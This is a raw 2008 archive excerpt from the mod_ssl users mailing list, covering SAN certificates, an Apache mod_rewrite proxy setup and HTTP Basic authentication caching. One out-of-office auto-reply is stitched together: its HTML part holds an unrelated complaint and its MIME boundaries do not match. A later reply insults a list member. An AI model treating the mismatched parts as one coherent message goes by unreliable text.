Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Cuesta Gilles schrieb:
> "*MULTIPLE CN (SAN) SERVER CERTIFICATES*
> 
> This type of certificate (also called /Subject Alternative Name/ (SAN) ) 
> enables to secure not only one website but a large number of sites (a 
> list of sites) hosted on a shared infrastructure (server with multiple 
> names, reverse proxy). Ideal to secure multiple brands of a corporation. 
> One certificate per hardware is required."

This only means that one host can have several names by configuring 
ServerName and ServerAlias, but does not enable virtual hosting.

Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 13:35:06 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9F42914DA53; Fri, 11 Jul 2008 13:35:06 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.werum.de (mx1.werum.de [62.156.157.70])
	by master.modssl.org (Postfix) with ESMTP id 43A4914D85B
	for ; Fri, 11 Jul 2008 13:35:06 +0200 (CEST)
Received: from mailsmtp.werum.net (mailsmtp.werum.net [172.20.0.111])
	by mx1.werum.de (Postfix) with ESMTP id 373DD31A93F
	for ; Fri, 11 Jul 2008 13:34:09 +0200 (CEST)
Received: from werum815.werum.net ( [172.20.104.15]) by mailsmtp.werum.net
          (Spamfinder) with SMTP id 38FC35EC783; Fri, 11 Jul 2008 13:34:08 +0200
Received: from localhost (content-scanner.mail.werum.net [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 7C09C179C64;
	Fri, 11 Jul 2008 13:34:05 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 10850-09; Fri, 11 Jul 2008 13:19:39 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id A9175179C63
	for ; Fri, 11 Jul 2008 13:34:04 +0200 (CEST)
Message-ID: <4877452E.60304@werum.de>
Date: Fri, 11 Jul 2008 13:34:06 +0200
From: Eckard Wille 
User-Agent: Thunderbird 2.0.0.14 (Windows/20080421)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject:Re: SSL proxy
References: <410-220087410202352796@thepinc.com> <4877124F.40604@werum.de> <4877138E.70608@gmail.com> <48772E49.2050107@werum.de> <48773992.2080705@gmail.com> <48773C93.3010602@werum.de>
In-Reply-To: <48773C93.3010602@werum.de>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-4.399 tagged_above=-999 required=300
 tests=ALL_TRUSTED, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Eckard Wille schrieb:
> Cuesta Gilles schrieb:
>> "*MULTIPLE CN (SAN) SERVER CERTIFICATES*
>>
>> This type of certificate (also called /Subject Alternative Name/ (SAN) 
>> ) enables to secure not only one website but a large number of sites 
>> (a list of sites) hosted on a shared infrastructure (server with 
>> multiple names, reverse proxy). Ideal to secure multiple brands of a 
>> corporation. One certificate per hardware is required."
> 
> This only means that one host can have several names by configuring 
> ServerName and ServerAlias, but does not enable virtual hosting.

Hi Cuesta,

with some tricks you could achive your goal by using the preconditions 
of mod_rewrite rules. If your ssl proxy has one single host entry with 
such a multi-named cert, it may be possible to rewrite via proxy after 
a look at the host header:

   RewriteEngine on
   RewriteCond %{HTTP_HOST} www.vhost1.com
   RewriteRule ^/(.*) www.internal.http.vhost1.com/$1 [P]

   RewriteCond %{HTTP_HOST} www.vhost2.com
   RewriteRule ^/(.*) www.internal.http.vhost2.com/$1 [P]

If this works for you depends also on the backend webapps, for example 
if they are capable of running behind a reverse proxy with a different 
http schema (HTTP<->HTTPS, servername references in html, internal 
redirects...).

Good luck

Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 14:33:52 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C7E0614DA55; Fri, 11 Jul 2008 14:33:52 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.w3works.com (mail.w3works.com [64.65.208.77])
	by master.modssl.org (Postfix) with ESMTP id 11B0814D85B
	for ; Fri, 11 Jul 2008 14:33:51 +0200 (CEST)
Received: (qmail 20389 invoked from network); 11 Jul 2008 12:32:53 -0000
Received: from zuul.w3works.com (HELO iXanax2.local) (dave@w3works.net@64.65.208.78)
  by mail.w3works.com with SMTP; 11 Jul 2008 12:32:53 -0000
Message-ID: <487752EE.3020701@w3works.com>
Date: Fri, 11 Jul 2008 08:32:46 -0400
From: Dave Paris 
User-Agent: Thunderbird 2.0.0.14 (Macintosh/20080421)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL proxy
References: <410-220087410202352796@thepinc.com> <4877124F.40604@werum.de> <4877138E.70608@gmail.com> <48772E49.2050107@werum.de> <48773992.2080705@gmail.com>
In-Reply-To: <48773992.2080705@gmail.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It seem like you might be confusing "shared infrastructure" with 
"single ip".  As others have said, you need a distinct address for each 
SSL-enabled httpd or proxy, although they can reside on the same hardware.

A good example of this is the typical configuration for larger server 
farms. You find multiple High Availability load balancers in the DMZ for 
both http and https using something like ha/keepalived for linux.  These 
proxy the incoming request back into private address space.  The SSL 
proxies terminate the SSL connection and broker the request on behalf of 
the user and everything goes to the private address space in plain http. 
  This allows each of the _real_ webservers to achieve better 
performance since the SSL overhead is not present.

While you can use Apache as an SSL-terminating proxy, I find I get 
better performance, lower memory utilization and easier configuration 
using Pound ( http://www.apsis.ch/pound/ ). Using keepalived, I have 
multiple public IP addresses floating between several hosts and pound 
binds https to those addresses.

Hope that adds a bit of additional clarity,
Dave

Cuesta Gilles sent forth:
> So what about this ?
> "*MULTIPLE CN (SAN) SERVER CERTIFICATES*
> 
> This type of certificate (also called /Subject Alternative Name/ (SAN) ) 
> enables to secure not only one website but a large number of sites (a 
> list of sites) hosted on a shared infrastructure (server with multiple 
> names, reverse proxy). Ideal to secure multiple brands of a corporation. 
> One certificate per hardware is required."
> 
> http://www.tbs-certificats.com/index.html.en
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 11 23:51:28 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8338414DA57; Fri, 11 Jul 2008 23:51:28 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from cpe-websrv.commpower.com (206-169-78-225.static.twtelecom.net [206.169.78.225])
	by master.modssl.org (Postfix) with ESMTP id 0D68314D85B
	for ; Fri, 11 Jul 2008 23:51:27 +0200 (CEST)
Received: from cpe-websrv (127.0.0.1) by cpe-websrv.commpower.com (MlfMTA v3.2r9) id heva980171sg for ; Fri, 11 Jul 2008 14:45:55 -0700 (envelope-from )
Received: from cpe-mailsrv.commpower.local ([172.16.1.12])
	by cpe-websrv (exchsrv.commpower.com)
	with SMTP; Fri, 11 Jul 2008 14:45:55 -0700
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C8E39F.C5DC7C55"
X-MimeOLE: Produced By Microsoft Exchange V6.5
Subject: Apache removal of user's access rights
Date: Fri, 11 Jul 2008 14:47:53 -0700
Message-ID: <75B42023F0E28D4999F857D17ED71654045F6F@cpe-mailsrv.commpower.local>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache removal of user's access rights
Thread-Index: Acjjn8XVZmTyzHQOQlSllfsNwrjHJQ==
From: "Beth E. Okun" 
To: 
X-Mlf-Version: 6.1.0.9597
X-Mlf-UniqueId: o200807112145550074777
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Beth E. Okun" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C8E39F.C5DC7C55
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi.............
=20
We're running Apache with ssl enabled..........We're using Basic =
authentication, and if the user browses away from our site and then =
comes back, they are not forced to log on again.......it appears that =
these settings are being stored somewhere, or that the connection is not =
being closed..........
=20
If you have any suggestions on how to remedy this situation, it would =
really be appreciated.
=20
Thank you for your time............
=20
Sincerely,
=20
Beth E. Okun

------_=_NextPart_001_01C8E39F.C5DC7C55
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

=0A=
=0A=
=0A=
=0A=

Hi.............
=0A=

 
=0A=

We're running Apache with ssl =
enabled..........We're using Basic authentication, and if the =
user browses away from our site and then comes back, they are =
not forced to log on again.......it appears that these settings are =
being stored somewhere, or that the connection is not being =
closed..........
=0A=

 
=0A=

If you have any suggestions on how to =
remedy this situation, it would really be appreciated.
=0A=

 
=0A=

Thank you for your =
time............
=0A=

 
=0A=

Sincerely,
=0A=

 
=0A=

Beth E. Okun

------_=_NextPart_001_01C8E39F.C5DC7C55--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 12 01:39:04 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6478D14DA43; Sat, 12 Jul 2008 01:39:04 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id C947414D839
	for ; Sat, 12 Jul 2008 01:39:03 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id 5E0D81C6701
	for ; Sat, 12 Jul 2008 01:38:06 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv2.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id R2dsFNn3MZUE for ;
	Sat, 12 Jul 2008 01:37:38 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id 319D01C66B9
	for ; Sat, 12 Jul 2008 01:37:38 +0200 (CEST)
Message-ID: <4877EEC1.7060408@stroeder.com>
Date: Sat, 12 Jul 2008 01:37:37 +0200
From: =?ISO-8859-1?Q?Michael_Str=F6der?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080702 SeaMonkey/1.1.11
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache removal of user's access rights
References: <75B42023F0E28D4999F857D17ED71654045F6F@cpe-mailsrv.commpower.local>
In-Reply-To: <75B42023F0E28D4999F857D17ED71654045F6F@cpe-mailsrv.commpower.local>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Michael_Str=F6der?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Beth E. Okun wrote:
> 
> We're running Apache with ssl enabled..........We're using Basic 
> authentication, and if the user browses away from our site and then 
> comes back, they are not forced to log on again.......it appears that 
> these settings are being stored somewhere, or that the connection is not 
> being closed..........

How about to read about how Basic Authentication works? Or maybe watch 
the traffic with http://livehttpheaders.mozdev.org? Basically the 
browser caches username/password once entered for a HTTP authc realm and 
sends it in the header of every HTTP request. That's the problem with 
HTTP basic authc.

Ciao, Michael.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 12 10:02:38 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B49C714DA5A; Sat, 12 Jul 2008 10:02:38 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from smtp7-g19.free.fr (smtp7-g19.free.fr [212.27.42.64])
	by master.modssl.org (Postfix) with ESMTP id 62B2514D839
	for ; Sat, 12 Jul 2008 10:02:36 +0200 (CEST)
Received: from smtp7-g19.free.fr (localhost [127.0.0.1])
	by smtp7-g19.free.fr (Postfix) with ESMTP id BFDBD322832
	for ; Sat, 12 Jul 2008 10:01:39 +0200 (CEST)
Received: from [192.168.12.11] (lns-bzn-48f-62-147-219-210.adsl.proxad.net [62.147.219.210])
	by smtp7-g19.free.fr (Postfix) with ESMTP id 97315322812
	for ; Sat, 12 Jul 2008 10:01:39 +0200 (CEST)
Message-ID: <487864E4.6070302@gmail.com>
Date: Sat, 12 Jul 2008 10:01:40 +0200
From: "Gilles Cuesta (Gmail)" 
User-Agent: Thunderbird 2.0.0.14 (Windows/20080421)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache removal of user's access rights
References: <75B42023F0E28D4999F857D17ED71654045F6F@cpe-mailsrv.commpower.local> <4877EEC1.7060408@stroeder.com>
In-Reply-To: <4877EEC1.7060408@stroeder.com>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Cuesta (Gmail)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Michael Ströder a écrit :
> Beth E. Okun wrote:
>>
>> We're running Apache with ssl enabled..........We're using Basic 
>> authentication, and if the user browses away from our site and then 
>> comes back, they are not forced to log on again.......it appears that 
>> these settings are being stored somewhere, or that the connection is 
>> not being closed..........
>
> How about to read about how Basic Authentication works? Or maybe watch 
> the traffic with http://livehttpheaders.mozdev.org? Basically the 
> browser caches username/password once entered for a HTTP authc realm 
> and sends it in the header of every HTTP request. That's the problem 
> with HTTP basic authc.
This Apache related, not modssl related.

Whereas, there are technical ways to reproduce an end of session, using 
secondary session_id, just like phpmyadmin.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 13 19:43:10 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 66EA614DA4E; Sun, 13 Jul 2008 19:43:10 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from e2.ny.us.ibm.com (e2.ny.us.ibm.com [32.97.182.142])
	by master.modssl.org (Postfix) with ESMTP id F3E4514D82F
	for ; Sun, 13 Jul 2008 19:43:09 +0200 (CEST)
Received: from d01relay04.pok.ibm.com (d01relay04.pok.ibm.com [9.56.227.236])
	by e2.ny.us.ibm.com (8.13.8/8.13.8) with ESMTP id m6DHgB6R018173
	for ; Sun, 13 Jul 2008 13:42:11 -0400
Received: from d01av03.pok.ibm.com (d01av03.pok.ibm.com [9.56.224.217])
	by d01relay04.pok.ibm.com (8.13.8/8.13.8/NCO v9.0) with ESMTP id m6DHgBud241720
	for ; Sun, 13 Jul 2008 13:42:11 -0400
Received: from d01av03.pok.ibm.com (loopback [127.0.0.1])
	by d01av03.pok.ibm.com (8.12.11.20060308/8.13.3) with ESMTP id m6DHgAFr028620
	for ; Sun, 13 Jul 2008 13:42:10 -0400
Received: from d01ml392.pok.ibm.com (d01ml392.pok.ibm.com [9.56.228.50])
	by d01av03.pok.ibm.com (8.12.11.20060308/8.12.11) with ESMTP id m6DHgA5G028603
	for ; Sun, 13 Jul 2008 13:42:10 -0400
Subject: AUTO: Jeff Donald is out of the office. (returning 07/25/2008)
From: Jeff Donald 
To: modssl-users@modssl.org
Message-ID: 
Date: Sun, 13 Jul 2008 13:42:09 -0400
X-MIMETrack: Serialize by Router on D01ML392/01/M/IBM(Release 7.0.2FP2 IGS702FP2HF8|March
 12, 2008) at 07/13/2008 13:42:10
MIME-Version: 1.0
Content-type: multipart/alternative; 
	Boundary="0__=0ABBFE16DFF2B8FE8f9e8a93df938690918c0ABBFE16DFF2B8FE"
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeff Donald 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0__=0ABBFE16DFF2B8FE8f9e8a93df938690918c0ABBFE16DFF2B8FE
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: quoted-printable



I am out of the office until 07/25/2008.

For the week of July 14-18th I will be out of the office on vacation an=
d
will not be checking vmail or email.

For the week of July 21-25th I will be travelling in the United States =
and
will only have intermittent email access.

While I'm away please feel free to contact my manager, Nancy Crooks
(ncrooks@us.ibm.com) at 201 967-6428 for any technical issues related t=
o
ITCAM.

I will respond to your message when I return.

Thank you.


Note: This is an automated response to your message  "Apache removal of=

user's access rights" sent on 7/11/08 17:47:53.

This is the only notification you will receive while this person is awa=
y.=

--0__=0ABBFE16DFF2B8FE8f9e8a93df938690918c0ABBFE16DFF2B8FE
Content-type: text/html; charset=US-ASCII
Content-Disposition: inline
Content-transfer-encoding: quoted-printable





stop stop  sending me 


this bs , i have no idea  who are =
you !!!!


stop !!!!!!!!!!!!!!!


-------------- Original message from Dave Paris <dparis@w=
3works.com>: -------------- 


> It seem like you might be c=
onfusing "shared infrastructure" with 
> "single ip". As others have =
said, you need a distinct address for each 
> SSL-enabled httpd or pr=
oxy, although they can reside on the same hardware. 
> 
> A goo=
d example of this is the typical configuration for larger server 
> f=
arms. You find multiple High Availability load balancers in the DMZ for > both http and https using something like ha/keepalived for linux. The=
se 
> proxy the incoming request back into private address space. The=
 SSL 
> proxies terminate the SSL connection and broker the request o=
n behalf of 
> the user and everything goes to the private address sp=
ace in plain http. 
> This allows each of the _real_ webservers to ac=
hieve better 
> performance since the SSL overhead is not present. > 
> While you can use Apache as an SSL-terminating proxy, I fin=
d I get 
> better performance, lower memory utilization and easier co=
nfiguration 
> using Pound ( http://www.apsis.ch/pound/ ). Using keep=
alived, I have 
> multiple public IP addresses floating between sever=
al hosts and pound 
> binds https to those addresses. 
> 
&g=
t; Hope that adds a bit of additional clarity, 
> Dave 
> 
&=
gt; Cuesta Gilles sent forth: 
> > So what about this ? 
> &=
gt; "*MULTIPLE CN (SAN) SERVER CERTIFICATES* 
> > 
> > Th=
is type of certificate (also called /Subject Alternative Name/ (SAN) ) 
=
> > enables to secure not only one website but a large number of site=
s (a 
> > list of sites) hosted on a shared infrastructure (server=
 with multiple 
> > names, reverse proxy). Ideal to secure multipl=
e brands of a corporation. 
> > One certificate per hardware is re=
quired." 
> > 
> > http://www.tbs-certificats.com/index.h=
tml.en 
> > 
> _____________________________________________=
_________________________ 
> Apache Interface to OpenSSL (mod_ssl) ww=
w.modssl.org 
> User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org 






--NextPart_Webmail_9m3u9jl4l_22034_1216059012_1--

--NextPart_Webmail_9m3u9jl4l_22034_1216059012_0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 14 21:14:06 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 02DDC14DA38; Mon, 14 Jul 2008 21:14:06 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from an-out-0708.google.com (an-out-0708.google.com [209.85.132.248])
	by master.modssl.org (Postfix) with ESMTP id 6CC3914D840
	for ; Mon, 14 Jul 2008 21:14:05 +0200 (CEST)
Received: by an-out-0708.google.com with SMTP id c3so839196ana.27
        for ; Mon, 14 Jul 2008 12:13:07 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:in-reply-to:mime-version:content-type:references;
        bh=8fKJMBOi0tcRUUrBhMuA5w7Vs/IOnXDmnDepDuMDEd0=;
        b=mLjhjIjMIqQK8sB05tS7edW/ywu/vTDR65U9ivLxx2kcIp4tDtkzjPqhefwNw2/3TR
         me/Aweb6rB+sGq6K0tjO7jjGR+nBYJgsIDNkHZdx7mTcsinyWnw3mYpsArQyEfAKjgso
         sOBQ0JZxMFfOLf5xIts8q+mACKMfolmBDI+zI=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:in-reply-to:mime-version
         :content-type:references;
        b=pYLEMhdgnQ2x/h18Q5dDiNehy/1cqaaPV1wWVS5gCOT7BgDwJ7obn3IIRpPkd+h2DZ
         FthSXO0JDTMqQ8xndIbxl98VUlsbQMc5yXrYeHO3CkGlz3leHdnhs/9BTo3A2aI0JBwW
         b2EbhUwB04cDkrcbjJNTmykjzfWjhdYoReTjg=
Received: by 10.100.212.6 with SMTP id k6mr10574791ang.142.1216062785990;
        Mon, 14 Jul 2008 12:13:05 -0700 (PDT)
Received: by 10.101.66.4 with HTTP; Mon, 14 Jul 2008 12:13:05 -0700 (PDT)
Message-ID: 
Date: Mon, 14 Jul 2008 20:13:05 +0100
From: "Shahadat Hossain" 
To: modssl-users@modssl.org
Subject: Re: wrong e-mail !!!!!!!!!!!!!!!!!!!!!!!
In-Reply-To: <071420081810.22034.487B9684000ACF8F0000561222218675169B0A02D2089B9A019C04040A0DBFCFCD0E05079D0A@att.net>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_58931_3824991.1216062786004"
References: <410-220087410202352796@thepinc.com> <4877124F.40604@werum.de>
	 <4877138E.70608@gmail.com> <48772E49.2050107@werum.de>
	 <48773992.2080705@gmail.com> <487752EE.3020701@w3works.com>
	 <071420081810.22034.487B9684000ACF8F0000561222218675169B0A02D2089B9A019C04040A0DBFCFCD0E05079D0A@att.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shahadat Hossain" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_58931_3824991.1216062786004
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

you know what, You are a f***en idiot.
if you do not want to receive these emails, just get your name taken off
from the list instead of b-shitting.

send an email to majordomo@modssl.org address (you can also find it at the
bottom of this message) with subject as 'Remove me'.

ok?

On Mon, Jul 14, 2008 at 7:10 PM,  wrote:

>  stop stop  sending me
> this bs , i have no idea  who are you !!!!
> stop !!!!!!!!!!!!!!!
>
> -------------- Original message from Dave Paris :
> --------------
>
>
> > It seem like you might be confusing "shared infrastructure" with
> > "single ip". As others have said, you need a distinct address for each
> > SSL-enabled httpd or proxy, although they can reside on the same
> hardware.
> >
> > A good example of this is the typical configuration for larger server
> > farms. You find multiple High Availability load balancers in the DMZ for
> > both http and https using something like ha/keepalived for linux. These
> > proxy the incoming request back into private address space. The SSL
> > proxies terminate the SSL connection and broker the request on behalf of
> > the user and everything goes to the private address space in plain http.
> > This allows each of the _real_ webservers to achieve better
> > performance since the SSL overhead is not present.
> >
> > While you can use Apache as an SSL-terminating proxy, I find I get
> > better performance, lower memory utilization and easier configuration
> > using Pound ( http://www.apsis.ch/pound/ ). Using keepalived, I have
> > multiple public IP addresses floating between several hosts and pound
> > binds https to those addresses.
> >
> > Hope that adds a bit of additional clarity,
> > Dave
> >
> > Cuesta Gilles sent forth:
> > > So what about this ?
> > > "*MULTIPLE CN (SAN) SERVER CERTIFICATES*
> > >
> > > This type of certificate (also called /Subject Alternative Name/ (SAN)
> )
> > > enables to secure not only one website but a large number of sites (a
> > > list of sites) hosted on a shared infrastructure (server with multiple
> > > names, reverse proxy). Ideal to secure multiple brands of a
> corporation.
> > > One certificate per hardware is required."
> > >
> > > http://www.tbs-certificats.com/index.html.en
> > >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl) www.modssl.org
> > User Support Mailing List modssl-users@modssl.org
> > Automated List Manager majordomo@modssl.org
>
>

------=_Part_58931_3824991.1216062786004
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


you know what, You are a f***en idiot.


if you do not want to receive these emails, just get your name taken off from the list instead of b-shitting. 


 


send an email to majordomo@modssl.org address (you can also find it at the bottom of this message) with subject as 'Remove me'.


 


ok?



On Mon, Jul 14, 2008 at 7:10 PM, <erika20@bellsouth.net> wrote:








stop stop  sending me 


this bs , i have no idea  who are you !!!!


stop !!!!!!!!!!!!!!!


-------------- Original message from Dave Paris <dparis@w3works.com>: -------------- 



> It seem like you might be confusing "shared infrastructure" with 
> "single ip". As others have said, you need a distinct address for each 
> SSL-enabled httpd or proxy, although they can reside on the same hardware. 

> 
> A good example of this is the typical configuration for larger server 
> farms. You find multiple High Availability load balancers in the DMZ for 
> both http and https using something like ha/keepalived for linux. These 

> proxy the incoming request back into private address space. The SSL 
> proxies terminate the SSL connection and broker the request on behalf of 
> the user and everything goes to the private address space in plain http. 

> This allows each of the _real_ webservers to achieve better 
> performance since the SSL overhead is not present. 
> 
> While you can use Apache as an SSL-terminating proxy, I find I get 
> better performance, lower memory utilization and easier configuration 

> using Pound ( http://www.apsis.ch/pound/ ). Using keepalived, I have 
> multiple public IP addresses floating between several hosts and pound 
> binds https to those addresses. 

> 
> Hope that adds a bit of additional clarity, 
> Dave 
> 
> Cuesta Gilles sent forth: 
> > So what about this ? 
> > "*MULTIPLE CN (SAN) SERVER CERTIFICATES* 
> > 

> > This type of certificate (also called /Subject Alternative Name/ (SAN) ) 
> > enables to secure not only one website but a large number of sites (a 
> > list of sites) hosted on a shared infrastructure (server with multiple 

> > names, reverse proxy). Ideal to secure multiple brands of a corporation. 
> > One certificate per hardware is required." 
> > 
> > http://www.tbs-certificats.com/index.html.en 

> > 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org 
> User Support Mailing List modssl-users@modssl.org 

> Automated List Manager majordomo@modssl.org 



------=_Part_58931_3824991.1216062786004--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 14 21:25:47 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8B42314DA5B; Mon, 14 Jul 2008 21:25:47 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from fmailhost04.isp.att.net (fmailhost04.isp.att.net [204.127.217.104])
	by master.modssl.org (Postfix) with ESMTP id 0941414DA38
	for ; Mon, 14 Jul 2008 21:25:46 +0200 (CEST)
Received: from fwebmail03.isp.att.net ([204.127.218.103])
          by isp.att.net (frfwmhc04) with SMTP
          id <20080714192447H04009agi2e>; Mon, 14 Jul 2008 19:24:47 +0000
X-Originating-IP: [204.127.218.103]
Received: from [66.176.74.215] by fwebmail03.isp.att.net;
	Mon, 14 Jul 2008 19:24:46 +0000
From: erika20@bellsouth.net
To: modssl-users@modssl.org
Subject: Re: wrong e-mail !!!!!!!!!!!!!!!!!!!!!!!
Date: Mon, 14 Jul 2008 19:24:46 +0000
Message-Id: <071420081924.25854.487BA7FE000A4200000064FE22230647629B0A02D2089B9A019C04040A0DBFCFCD0E05079D0A@att.net>
In-Reply-To: 
References: <410-220087410202352796@thepinc.com>
 <4877124F.40604@werum.de>
 <4877138E.70608@gmail.com>
 <48772E49.2050107@werum.de>
 <48773992.2080705@gmail.com>
 <487752EE.3020701@w3works.com>
 <071420081810.22034.487B9684000ACF8F0000561222218675169B0A02D2089B9A019C04040A0DBFCFCD0E05079D0A@att.net>
 
X-Mailer: AT&T Message Center Version 1 (Jun 10 2008)
X-Authenticated-Sender: ZXJpa2EyMEBiZWxsc291dGgubmV0
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="NextPart_Webmail_9m3u9jl4l_25854_1216063486_0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: erika20@bellsouth.net
